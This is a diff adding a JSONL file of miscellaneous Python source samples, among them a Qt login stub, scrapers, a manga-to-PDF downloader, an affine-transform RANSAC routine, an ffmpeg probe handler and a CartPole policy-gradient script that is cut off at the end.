diff --git "a/2158.jsonl" "b/2158.jsonl" new file mode 100644--- /dev/null +++ "b/2158.jsonl" @@ -0,0 +1,661 @@ +{"seq_id":"344061298","text":"import RegisterUIConnect\n\n__author__ = 'win.thitiwat'\n\nimport sys\n\nfrom PySide.QtGui import *\nfrom PySide.QtUiTools import *\nimport RegisterUIConnect\nimport MainWindow\n\n\nimport Resources\n\n\nclass Login(QWidget):\n def __init__(self, parent = None):\n QWidget.__init__(self)\n # layout = QVBoxLayout()\n loader = QUiLoader()\n self.form = loader.load(\"UI/Login.ui\", self)\n # layout.addWidget(self.form)\n # self.setLayout(layout)\n\n self.backgroundLogin = self.form.findChild(QLabel, \"backgroundLogin\")\n self.symbol = self.form.findChild(QLabel, \"symbol\")\n self.create_acc = self.form.findChild(QPushButton, \"createAcc\")\n self.login = self.form.findChild(QPushButton, \"login\")\n self.notify_incorrect = self.form.findChild(QLabel, \"notify_incorrect\")\n\n self.backgroundLogin.setPixmap(QPixmap(\"images/background.png\"))\n self.symbol.setPixmap(QPixmap(\"images/se_kmitl.png\"))\n\n self.create_acc.clicked.connect(self.goRegister)\n self.login.clicked.connect(self.check_Login)\n self.backgroundLogin.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n self.setFixedSize(self.form.width(), self.form.height())\n\n def goRegister(self):\n self.hide()\n self.registerPage = RegisterUIConnect.RegisterUIConnect()\n self.registerPage.show()\n pass\n\n def check_Login(self):\n return self.goMainPage()\n\n def goMainPage(self):\n self.hide()\n self.mainWin = MainWindow.MainWindow()\n self.mainWin.show()\n\ndef main():\n app = QApplication(sys.argv)\n sample = Login()\n sample.show()\n return app.exec_()\n\nif __name__ == \"__main__\":\n sys.exit(main())\n\n","sub_path":"Project 170515/Login.py","file_name":"Login.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"130390105","text":"N=int(raw_input())\na=[]\nfor i in range(2,N):\n c=0\n for j in range(2,i):\n\t if i%j==0:\n c=1\n if c==0:\n\t a.append(i)\nif a==[]:\n print(\"0\")\nelse:\n print(\" \".join(str(i) for i in a))\n","sub_path":"all primes lessthen n.py","file_name":"all primes lessthen n.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"642748294","text":"from graphics import *\n\n\ndef main():\n\twin = GraphWin('Periodic table of elements by Sebastian Gorski', 1000, 600)\n\twin.setBackground(\"black\")\n\th = Element(50, 50, 'H', 'Hydrogen', 'blue', win)\n\the = Element(900, 50, 'He', 'Helium', 'orange', win)\n\tli = Element(50, 90, 'Li', 'Lithium', 'blue', win)\n\twin.getMouse()\n\twin.close()\n\nclass Element:\n\tdef __init__(self, x, y, symbol, name, color, window):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.symbol = symbol\n\t\tself.name = name\n\t\tself.window = window\n\t\tself.color = color\n\t\trect = Rectangle(Point(x, y), Point(x+45, y+45))\n\t\trect.setFill(color)\n\t\trect.setOutline(\"white\")\n\t\trect.draw(window)\n\t\ttext = Text(Point(x+20, y+22), symbol)\n\t\ttext.setFill('red')\n\t\ttext.setStyle('bold')\n\t\ttext.setSize(15)\n\t\ttext.draw(window)\n\t\t\n\t\t\n\nmain()\n\n","sub_path":"table/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"196722371","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom bs4 import BeautifulSoup\r\nfrom download import request\r\nfrom pymongo import MongoClient\r\nimport datetime\r\nimport time\r\nimport os\r\nimport re\r\n\r\nclass duowan(object):\r\n ''''''\r\n\r\n def __init__(self):\r\n\r\n self.index = 'http://tu.duowan.com/tu'\r\n self.lxh_index = ''\r\n client = MongoClient() ## MongDB client\r\n db = client['zzx'] ## choose a db\r\n self.duowan_collection = db['duowan_lxh'] ##choose a collection in db\r\n self.path = 'F:\\\\duowan'\r\n\r\n\r\n def get_all_href(self):\r\n index = request.get(self.index, 3)\r\n Soup = BeautifulSoup(index.text, 'lxml')\r\n li_tmp = Soup.find('div', id='subnav_pk').find_all('li')\r\n for li in li_tmp:\r\n if li.get_text()=='冷笑话':# 冷笑话代表'冷笑话几个字'\r\n self.lxh_index = li.a['href']\r\n break\r\n lxh = request.get(self.lxh_index, 3)\r\n #print(lxh.text)\r\n Soup = BeautifulSoup(lxh.text, 'lxml')\r\n page_href_list = Soup.find_all('li', class_='box')\r\n page_num = 1\r\n for page in page_href_list:\r\n if page['class'] != ['box']:\r\n print(page['class'])\r\n else:\r\n page_title = page.find('em').get_text()\r\n page_link = page.find('em').find('a')['href']\r\n #print(page_title, page_link)\r\n self.get_img(page_title, page_link, page_num)\r\n page_num += 1\r\n\r\n\r\n def get_img(self, page_title, page_link, page_num):\r\n page_link = page_link.replace('gallery', 'scroll')\r\n page_img = request.get(page_link, 3)\r\n Soup = BeautifulSoup(page_img.text, 'lxml')\r\n img_div_list = Soup.find_all('div', class_='pic-box')\r\n img_num = 1\r\n for img_div in img_div_list:\r\n img_title = img_div.find('p').get_text()\r\n #input(img_div)\r\n if img_title != '下期预告':#'下期预告'为'下集预告'\r\n img_src = img_div.find('span')['data-img']\r\n if not self.duowan_collection.find_one({'img_src': img_src}):\r\n self.save_img(img_title, img_src, page_num, img_num)\r\n post = {\r\n 'page_title': page_title,\r\n 'page_link': page_link,\r\n 'img_num': str(page_num)+'.'+str(img_num),\r\n 'img_title': img_title,\r\n 'img_src': img_src\r\n }\r\n print(img_title)\r\n self.duowan_collection.save(post)\r\n print('Success save img data')\r\n img_num += 1\r\n else:\r\n print('该页面已保存')\r\n else:\r\n break\r\n #return img_title, img_src\r\n\r\n def save_img(self, img_title, img_src, page_num, img_num):\r\n os.chdir(os.path.join(self.path))\r\n img = request.get(img_src, 3)\r\n name = str(page_num)+'.'+str(img_num)+' ' + img_title + img_src[-8:]\r\n if re.compile('

502 Bad Gateway

').match(img.text):\r\n print(re.compile('

502 Bad Gateway

').match(img.text))\r\n time.sleep(10)\r\n return self.save_img(img_src, img_title)\r\n else:\r\n f = open(name, 'ab')\r\n f.write(img.content)\r\n f.close()\r\n print('Success save ', name, '\\n')\r\n\r\nduowan = duowan()\r\nif __name__ == '__main__':\r\n duowan.get_all_href()","sub_path":"duowan/duowan.py","file_name":"duowan.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"418261981","text":"import os\nfrom data import *\n\n\ndef getch():\n import sys, tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n\ndef print_characters(choose):\n print('\\nYou can choose your class:')\n print('==========================')\n for each in choose:\n print('(' + str(choose.index(each) + 1) + ') ' + each)\n\n\ndef choose_character():\n get_player_name()\n choose = list(CHARACTERS)\n user_input = None\n while user_input not in ['1', '2', '3']:\n print_characters(choose)\n user_input = getch()\n character.append(choose[int(user_input) - 1])\n repository[CHARACTERS[character[0]]] += 1\n set_player_sign()\n\n\ndef get_player_name():\n print('What is your name sheepie?')\n print('==========================')\n name.append(input())\n name.pop(0)\n\n \nif __name__ == '__main__':\n choose_character()\n\n ","sub_path":"create_character.py","file_name":"create_character.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"114362440","text":"import torch\nimport warnings\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom torchtext.data import Example, Dataset, Field, BucketIterator\n\n\nclass TextPreprocessor(BaseEstimator, TransformerMixin):\n def __init__(self, fields, min_freq=1):\n self.fields = fields\n self.min_freq = min_freq\n\n def fit(self, X, y=None):\n dataset = self.transform(X, y)\n for name, field in dataset.fields.items():\n if field.use_vocab:\n field.build_vocab(dataset, min_freq=self.min_freq)\n return self\n\n def transform(self, X, y=None):\n with warnings.catch_warnings(record=True):\n fields = [(name, field) for (name, field) in self.fields\n if name in X]\n proc = [X[col].apply(f.preprocess) for col, f in fields]\n examples = [Example.fromlist(f, fields) for f in zip(*proc)]\n return Dataset(examples, fields)\n\n\ndef build_preprocessor(min_freq=5):\n with warnings.catch_warnings(record=True):\n text_field = Field(\n tokenize=None,\n init_token=None,\n pad_token=\"\",\n unk_token=\"\",\n eos_token=None,\n batch_first=True,\n # pad_first=True,\n )\n fields = [\n ('observed', text_field),\n ('gold', text_field),\n ]\n return TextPreprocessor(fields, min_freq=min_freq)\n\n\nclass SequenceIterator(BucketIterator):\n def __init__(self, *args, **kwargs):\n with warnings.catch_warnings(record=True):\n super().__init__(*args, **kwargs)\n\n def __iter__(self):\n with warnings.catch_warnings(record=True):\n for batch in super().__iter__():\n target = torch.empty(0)\n if 'gold' in batch.fields:\n target = batch.gold.view(-1)\n yield batch.observed, target\n","sub_path":"graphsage/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"36872265","text":"\"\"\"Узнаем что, такое вложенность в генераторах, а так же как ее использовать\"\"\"\n\nres= [x + y for x in [1,2,3] for y in [4,5,6]]\nprint(res)\n\nprint('#'*100)\n\n\n\"\"\"Анологичный пример с помощью цикла for\"\"\"\n\nres = []\n\nfor x in [1,2,3]:\n for y in [4,5,6]:\n res.append(x+y)\n\nprint(res)\n","sub_path":"IteratorsAndGenerators/NestedGenerator.py","file_name":"NestedGenerator.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"336493473","text":"\"\"\"Mangapark downloader.\n\nExample:\n Download chapter 20 for the manga Ajin Miura Tsuina\n\n $ python3 main.py -m http://mangapark.me/manga/ajin-miura-tsuina/ -chapter 20\n\"\"\"\nimport re\nimport os\nimport sys\nimport argparse\nimport urllib.request\nimport img2pdf\nfrom bs4 import BeautifulSoup\nfrom PIL import Image\nfrom resizeimage import resizeimage\n\ndef parse_url_to_manga_info(url: str) -> str:\n \"\"\"Extracts the title of a manga from an URL.\n \"\"\"\n url = re.sub('http://', '', url)\n url = re.sub('mangapark.me/manga/', '', url)\n title = url.split(\"/\")[0]\n return title\n\n\ndef parse_url_to_chapter_info(url: str) -> (str, str, str, str):\n \"\"\"Extract manga info from the URL.\n\n Returns:\n 4-tuple containing the mangas title, version, chapter and url\n \"\"\"\n url = re.sub(\"http://\", '', url)\n url = re.sub(\"mangapark.me\", '', url)\n url = re.sub(\"/manga/\", '', url)\n\n # compensate for mangapark's different url formatting schemes\n title, version, chapter = None, None, None\n if len(url.split(\"/\")) == 3:\n title, version, chapter = url.split(\"/\")\n elif len(url.split(\"/\")):\n title, _, version, chapter = url.split(\"/\")\n else:\n raise ValueError(\"Couldn't parse URL\")\n\n return title, version, chapter, url\n\n\ndef ensure_directory_exist(directory: str) -> None:\n \"\"\"Creates a directory, if it doesn't exist yet.\"\"\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef input_images(path: str) -> bytes:\n \"\"\"Reads an image from the specified source.\n\n Args:\n path: The path of the image.\n\n Returns:\n The raw image data.\n \"\"\"\n if path == '-':\n rawdata = sys.stdin.buffer.read()\n else:\n try:\n with open(path, \"rb\") as im:\n rawdata = im.read()\n except IsADirectoryError:\n raise argparse.ArgumentTypeError(\n \"\\\"%s\\\" is a directory\" % path)\n except PermissionError:\n raise argparse.ArgumentTypeError(\n \"\\\"%s\\\" permission denied\" % path)\n except FileNotFoundError:\n raise argparse.ArgumentTypeError(\n \"\\\"%s\\\" does not exist\" % path)\n if len(rawdata) == 0:\n raise argparse.ArgumentTypeError(\"\\\"%s\\\" is empty\" % path)\n return rawdata\n\n\ndef convert_to_pdf(os_dir: str, chapter: str, filenames: list) -> None:\n \"\"\"Converts images to a PDF.\n\n Args:\n os_dir: Directory to save PDF in.\n chapter: Title of the PDF.\n filenames: Images to construct the PDF from.\n \"\"\"\n print(\"Converting chapter %s to pdf...\" % chapter)\n\n pdf_bytes = None\n try:\n pdf_bytes = img2pdf.convert(*[input_images(path) for path in filenames])\n except img2pdf.PdfTooLargeError:\n # Sometimes the images are registered as having a dpi of 1.\n # Because PDF has a limitation of 200 iches max per side, a\n # special layout_fun has to be used, as to prevent an exception.\n\n # default manga size 5\"x7\"\n layout_fun = img2pdf.get_layout_fun(pagesize=(None, img2pdf.in_to_pt(7)),\n imgsize=None, border=None,\n fit=img2pdf.FitMode.into,\n auto_orient=False)\n pdf_bytes = img2pdf.convert(*[input_images(path) for path in filenames],\n layout_fun=layout_fun)\n\n file = open(\"%s/%s.pdf\" % (os_dir, chapter), \"wb\")\n file.write(pdf_bytes)\n print(\"Conversion completed!\")\n\n\ndef download_chapter(url: str, height: int) -> None:\n \"\"\"Downloads the chapter specified by the url.\"\"\"\n title, _, chapter, os_dir = parse_url_to_chapter_info(url)\n ensure_directory_exist(os_dir)\n try:\n page = urllib.request.urlopen(url)\n except ValueError:\n page = urllib.request.urlopen(\"http://mangapark.me\" + url)\n\n soup = BeautifulSoup(page, \"html.parser\")\n imgs_wrappers = soup.find_all(\"a\", {\"class\": \"img-link\"})\n filenames = []\n for i in imgs_wrappers:\n img_url = parse_url(i.img['src'])\n filename = img_url.split('/')[-1]\n print(\"Downloading %s %s %s...\" % (title, chapter, filename))\n dir_filename = os_dir + \"/\" + os.path.basename(img_url)\n urllib.request.urlretrieve(img_url, dir_filename)\n new_dir_filename = resize(dir_filename, height)\n filenames.append(new_dir_filename)\n\n convert_to_pdf(os_dir, chapter, filenames)\n\ndef parse_url(url: str) -> str:\n return re.sub(r'\\?.*', '', url)\n\ndef resize(filename: str, height: int) -> str:\n if height == None:\n return filename\n print(\"Resizing %s to %spx height...\" % (filename, height))\n with open(filename, 'r+b') as f:\n with Image.open(f) as image:\n cover = resizeimage.resize_height(image, height)\n new_filename = filename + '.res';\n cover.save(new_filename, image.format)\n return new_filename\n\ndef download_manga(url: str, chapter: int=None, min_max: (int, int)=None, height: int=None) -> None:\n \"\"\"Downloads chapters of a manga.\n\n Args:\n url: The URL of the manga.\n chapter: The chapter to download. If no chapter is specified, the\n min_max parameter will be used.\n min_max: The range of chapters to download.\n height: The height to witch resize all images (keeping the aspect ratio)\n \"\"\"\n page = urllib.request.urlopen(url)\n soup = BeautifulSoup(page, \"html.parser\")\n\n streams = soup.find_all(\"div\", {\"class\": \"stream\"})\n stream_lens = []\n for stream in streams:\n chapters = stream.find_all(\"li\")\n stream_lens += [len(chapters)]\n\n max_stream_len = max(stream_lens)\n max_idx = stream_lens.index(max_stream_len)\n best_stream = streams[max_idx]\n\n chapters = best_stream.find_all(\"li\")\n for c in chapters[::-1]:\n chapter_url = c.em.find_all(\"a\")[-1]['href']\n chapter_no = float(parse_url_to_chapter_info(chapter_url)[2][1: ])\n if chapter and chapter_no == chapter:\n download_chapter(chapter_url, height)\n break\n if min_max and chapter_no >= min_max[0] and chapter_no <= min_max[1]:\n download_chapter(chapter_url, height)\n continue\n\n\ndef main():\n \"\"\"Downloads manga specified in command line arguments.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-m', '--manga-url')\n parser.add_argument('-s', '--size', '--height', type=int, help='Height to resize images to (it will keet the aspect ratio)')\n parser.add_argument('-c', '--chapter')\n parser.add_argument('-cs', '--chapters', nargs=2)\n\n args = parser.parse_args()\n print(args)\n if args.manga_url is None:\n print(\"Please specify the URL of the manga on mangapark.me\")\n return\n elif args.chapters != None:\n assert isinstance(args.chapters, list)\n download_manga(args.manga_url, min_max=[float(x) for x in args.chapters], height=args.size)\n elif args.chapter != None:\n download_manga(args.manga_url, chapter=int(args.chapter), height=args.size)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"197215627","text":"import random\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef compute_affine_xform(matches,features1,features2,image1,image2):\n \"\"\"\n Computer Vision 600.461/661 Assignment 2\n Args:\n matches (list of tuples): list of index pairs of possible matches. For example, if the 4-th feature in feature_coords1 and the 0-th feature\n in feature_coords2 are determined to be matches, the list should contain (4,0).\n features1 (list of tuples) : list of feature coordinates corresponding to image1\n features2 (list of tuples) : list of feature coordinates corresponding to image2\n image1 (numpy.ndarray): The input image corresponding to features_coords1\n image2 (numpy.ndarray): The input image corresponding to features_coords2\n Returns:\n affine_xform (numpy.ndarray): a 3x3 Affine transformation matrix between the two images, computed using the matches.\n \"\"\"\n \n affine_xform = np.zeros((3,3))\n rows1, columns1 = [item[0] for item in features1], [item[1] for item in features1]\n rows2, columns2 = [item[0] for item in features2], [item[1] for item in features2]\n if len(matches) < 3:\n return affine_xform\n\n num_iter = 200\n best_form = np.zeros((6,1))\n best_inlier = -1\n\n for i in range(0, num_iter):\n randmatch = random.sample(matches, 3)\n x1 = columns1[randmatch[0][0]]\n y1 = rows1[randmatch[0][0]]\n x2 = columns1[randmatch[1][0]]\n y2 = rows1[randmatch[1][0]]\n x3 = columns1[randmatch[2][0]]\n y3 = columns1[randmatch[2][0]]\n\n xp1 = columns2[randmatch[0][1]]\n yp1 = rows2[randmatch[0][1]]\n xp2 = columns2[randmatch[1][1]]\n yp2 = rows2[randmatch[1][1]]\n xp3 = columns2[randmatch[2][1]]\n yp3 = rows2[randmatch[2][1]]\n\n \n A = np.array([[x1, y1, 1, 0, 0, 0], [0, 0, 0, x1, y1, 1], [x2, y2, 1, 0, 0, 0], [0, 0, 0, x2, y2, 1], [x3, y3, 1, 0, 0, 0], [0, 0, 0, x3, y3, 1]])\n\n if np.linalg.cond(A) > 1e+15:\n num_iter += 1\n continue\n \n b = np.array([xp1, yp1, xp2, yp2, xp3,yp3])\n \n #solve least squares\n #temp_affine = np.linalg.inv(A.T*A)*A.T*b\n temp_affine = np.linalg.solve(A,b)\n \n num_inliers = 0\n\n for j in range(0, len(matches)):\n diff_x = (np.dot(temp_affine[0], columns1[matches[j][0]]) + np.dot(temp_affine[1], rows1[matches[j][0]]) + temp_affine[2]) - columns2[matches[j][1]]\n diff_y = (np.dot(temp_affine[3], columns1[matches[j][0]]) + np.dot(temp_affine[4], rows1[matches[j][0]]) + temp_affine[5]) - rows2[matches[j][1]]\n if np.absolute(diff_x) < 3 and np.absolute(diff_y) <3:\n num_inliers += 1\n if num_inliers > best_inlier:\n xform = [[temp_affine[0], temp_affine[1], temp_affine[2]], [temp_affine[3], temp_affine[4], temp_affine[5]], [0, 0, 1]]\n if np.linalg.cond(xform) < 1e+15:\n best_inlier = num_inliers\n best_form = temp_affine\n else: \n num_iter += 1\n affine_xform = [[best_form[0], best_form[1], best_form[2]], [best_form[3], best_form[4], best_form[5]], [0, 0, 1]]\n return affine_xform\n","sub_path":"HW2/compute_affine_xform.py","file_name":"compute_affine_xform.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"251865756","text":"from asyncio import subprocess\nimport os\n\nfrom aiofile import async_open\nfrom core import BasicHandler\nfrom core.utils import pretty_size\nfrom core.web import ObjectNotFound, ServerError\nfrom xid import Xid\nimport ffmpeg\n\nDEFAULT_PATH = \"data/media/probe\"\nLIMIT = 10 * 2 << 29 # limit 10G\n\n\nclass APIProbe(BasicHandler):\n \"\"\"convert uploaded media file to mp4 container\n\n url params:\n - async: service will convert media in background\n - url: if start with http(s) will do a request when async task is done\n \"\"\"\n\n async def post(self):\n return await self.process()\n\n async def put(self):\n return await self.process()\n\n async def process(self):\n req = self.request\n\n # save upload data\n try:\n if not os.path.isdir(DEFAULT_PATH):\n os.makedirs(DEFAULT_PATH)\n except OSError:\n self.w(f\"{DEFAULT_PATH} path is not exists\")\n return ServerError()\n\n id = Xid().string()\n path_in = os.path.join(DEFAULT_PATH, id)\n\n size = 0\n\n try:\n async with async_open(path_in, \"wb+\") as fobj:\n async for data in req.content.iter_chunked(2 << 19): # 1mb\n size += len(data)\n\n if size > LIMIT:\n self.e(f\"task {id} upload size over limit {pretty_size(LIMIT)}\")\n raise ValueError()\n\n await fobj.write(data)\n except:\n self.x(f\"task {id} upload with exception\")\n return ServerError()\n\n self.d(f\"task {id} save data size {pretty_size(size)}\")\n\n try:\n probe = ffmpeg.probe(path_in)\n except ffmpeg.Error as e:\n self.e(f\"task {id} failed:{str(e)}\")\n return ServerError(500, str(e))\n finally:\n os.unlink(path_in)\n self.d(f\"task {id} is done\")\n\n video_stream = next((stream for stream in probe[\"streams\"] if stream[\"codec_type\"] == \"video\"), None)\n if video_stream is None:\n self.w(\"task {id} do not have any video stream\")\n return ObjectNotFound()\n\n return {\"data\": video_stream}\n","sub_path":"media/handlers/api_probe.py","file_name":"api_probe.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"331104695","text":"#!user/bin/python\n\nimport apple\nimport env\nimport ciscosparkapi\nfrom logging import Formatter, getLogger, StreamHandler, DEBUG\n\n\nlogger = getLogger(\"cml2_stop_real.\")\nlogger.setLevel(DEBUG)\nhandler = StreamHandler()\nhandler.setLevel(DEBUG)\nfmt = Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n \"%Y-%m-%dT%H:%M:%S\"\n)\nhandler.setFormatter(fmt)\nlogger.addHandler(handler)\nlogger.propagate = False\n\nenv_object = env.MyEnv()\nhost = env_object.my_env[\"cml2_0\"]\nwebex_token = env_object.my_env[\"webex_token\"]\nwebex_room = env_object.my_env[\"webex_room\"]\n\nob = apple.Cml2(host)\nob.delete_labs()\n\nwebex = ciscosparkapi.CiscoSparkAPI(access_token=webex_token)\nwebex.messages.create(\n webex_room,\n text=\"Successfully Cml stoped !!\"\n)\n\nlogger.debug(\"Successfully Cml stopde!!\")\n","sub_path":"rest/cml_stop_real.py","file_name":"cml_stop_real.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"266186160","text":"from peewee import *\nfrom playhouse.shortcuts import model_to_dict\n\nfrom .utils import send_notify\nfrom .extensions import db\n\n\nclass User(db.Model):\n nickname = CharField(null=False, unique=True)\n email = CharField(null=False)\n profile = CharField(null=True)\n password = CharField(null=False)\n avatar = CharField(null=True)\n is_enabled = BooleanField(default=True)\n is_email_enabled = BooleanField(default=True)\n\n @classmethod\n def disable_email(cls, nickname):\n cls.update(email_enabled=False).where(cls.nickname == nickname).execute()\n\n @classmethod\n def get_by_nickname(cls, nickname):\n return cls.select().where(cls.nickname == nickname).first()\n\n @classmethod\n def enable_email(cls, nickname):\n cls.update(email_enabled=True).where(cls.nickname == nickname).execute()\n\n @classmethod\n def disable_account(cls, nickname):\n cls.update(is_enabled=False).where(cls.nickname == nickname).execute()\n\n @classmethod\n def enable_account(cls, nickname):\n cls.update(is_enabled=True).where(cls.nickname == nickname).execute()\n\n\nclass Note(db.Model):\n body = CharField()\n user = ForeignKeyField(User, User.nickname)\n byline = CharField()\n archived = BooleanField(default=False)\n\n @classmethod\n def get_archived_notes(cls, nickname):\n notes = cls.select().where(cls.user == nickname, cls.archived == True)\n return [model_to_dict(note, recurse=False) for note in notes]\n\n @classmethod\n def get_unarchive_by_user(cls, nickname):\n notes = cls.select().where(cls.user == nickname, cls.archived == False)\n return [model_to_dict(note, recurse=False) for note in notes]\n\n def notify(self):\n send_notify(self)\n","sub_path":"saythanks/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"39146625","text":"import sys\n\nfrom smuthi.version import __version__\n\ntry:\n from mpi4py import MPI\n mpi_comm = MPI.COMM_WORLD\n mpi_rank = mpi_comm.Get_rank()\nexcept:\n mpi_rank = 0\n\n\ndef print_smuthi_header():\n welcome_msg = (\"\\n\" + \"*\" * 32 + \"\\n SMUTHI version \" + __version__ + \"\\n\" + \"*\" * 32 + \"\\n\")\n sys.stdout.write(welcome_msg)\n sys.stdout.flush()\n\n\n#if mpi_rank == 0:\n# print_smuthi_header()\n","sub_path":"smuthi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"110141278","text":"import re\nimport sys\nfrom collections import defaultdict\n\nwith open(\"instr.txt\") as f:\n content = f.readlines()\nreg = re.compile(r'(\\w+) (inc|dec) (-?\\d+) '\n r'if (\\w+) (<|>|==|!=|<=|>=) (-?\\d+)')\n\ndic = defaultdict(int)\nlines = [reg.match(x).groups() for x in content]\n\nfor l in lines:\n if l[4] == '<':\n cond = dic[l[3]] < int(l[5])\n elif l[4] == '<=':\n cond = dic[l[3]] <= int(l[5])\n elif l[4] == '>':\n cond = dic[l[3]] > int(l[5])\n elif l[4] == '>=':\n cond = dic[l[3]] >= int(l[5])\n elif l[4] == '==':\n cond = dic[l[3]] == int(l[5])\n else: # l[4] == '!=':\n cond = dic[l[3]] != int(l[5])\n\n if cond:\n if l[1] == 'inc':\n dic[l[0]] += int(l[2])\n else: # if l[1] == 'dec':\n dic[l[0]] -= int(l[2])\n\nmx = -sys.maxsize - 1\nfor x in dic:\n if dic[x] > mx:\n mx = dic[x]\nprint(mx)\n","sub_path":"8/instr_1.py","file_name":"instr_1.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"47744612","text":"import _plotly_utils.basevalidators\n\n\nclass LineValidator(_plotly_utils.basevalidators.CompoundValidator):\n def __init__(self, plotly_name=\"line\", parent_name=\"violin.box\", **kwargs):\n super(LineValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n data_class_str=kwargs.pop(\"data_class_str\", \"Line\"),\n data_docs=kwargs.pop(\n \"data_docs\",\n \"\"\"\n color\n Sets the inner box plot bounding line color.\n width\n Sets the inner box plot bounding line width.\n\"\"\",\n ),\n **kwargs,\n )\n","sub_path":"packages/python/plotly/plotly/validators/violin/box/_line.py","file_name":"_line.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"522735985","text":"__author__ = 'kiwee'\n\nimport pymongo\nimport random\n\nconn=pymongo.Connection('localhost', 27017)\nmydb=conn.mydb\nmydb.add_user('test','test')\nmydb.authenticate('test','test')\n\nmuser=mydb.user # new a table\nmuser.save({'id':1, 'name':'test'}) # add a record\nmuser.insert({'id':2, 'name':'hello'}) # add a record\nmuser.find_one() # find a record\nmuser.create_index('id')\ncontent=mydb.user.find()\nfor i in content:\n print(i)\nprint(content)","sub_path":"PycharmProjects/mongotest/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"525199333","text":"import tensorflow as tf\nimport numpy as np\nimport gym\n\nenv = gym.make('CartPole-v0')\nenv = env.unwrapped\n\nenv.seed(1)\n\n# Environment Hyperparameters\nstate_size = 4\naction_size = env.action_space.n\n\n# Training Hyperparameters\nmax_episodes = 1000\nlearning_rate = 0.01\ngamma = 0.95 # Discount rate\n\n# Take the rewards and perform discounting\ndef discount_and_normalize_rewards(episode_rewards):\n discounted_episode_rewards = np.zeros_like(episode_rewards)\n cumulative = 0.0\n for i in reversed(range(len(episode_rewards))):\n cumulative = cumulative * gamma + episode_rewards[i]\n discounted_episode_rewards[i] = cumulative\n\n mean = np.mean(discounted_episode_rewards)\n std = np.std(discounted_episode_rewards)\n discounted_episode_rewards = (discounted_episode_rewards - mean) / (std)\n\n return discounted_episode_rewards\n\n\n# The state is an array of 4 values which will be used as an input\n# The neural network is made up of 3 fully connected layers\n# The output activation function is softmax that squashes the outputs to a probability distribution\nwith tf.name_scope(\"inputs\"):\n input_ = tf.placeholder(tf.float32, [None, state_size], name=\"input_\")\n actions = tf.placeholder(tf.int32, [None, action_size], name=\"actions\")\n discounted_episode_rewards_ = tf.placeholder(tf.float32, [None,], name=\"discounted_episode_rewards\")\n \n mean_reward_ = tf.placeholder(tf.float32, name=\"mean_reward\")\n\n with tf.name_scope(\"fc1\"):\n fc1 = tf.contrib.layers.fully_connected(\n inputs = input_,\n num_outputs = 10,\n activation_fn=tf.nn.relu,\n weights_initializer=tf.contrib.layers.xavier_initializer())\n\n with tf.name_scope(\"fc2\"):\n fc2 = tf.contrib.layers.fully_connected(\n inputs = fc1,\n num_outputs = action_size,\n activation_fn=tf.nn.relu,\n weights_initializer=tf.contrib.layers.xavier_initializer())\n\n with tf.name_scope(\"fc3\"):\n fc3 = tf.contrib.layers.fully_connected(\n inputs = fc2,\n num_outputs = action_size,\n activation_fn=None,\n weights_initializer=tf.contrib.layers.xavier_initializer())\n\n with tf.name_scope(\"softmax\"):\n action_distribution = tf.nn.softmax(fc3)\n\n with tf.name_scope(\"loss\"):\n neg_log_prob = tf.nn.softmax_cross_entropy_with_logits(logits = fc3, labels = actions)\n loss = tf.reduce_mean(neg_log_prob * discounted_episode_rewards_)\n\n with 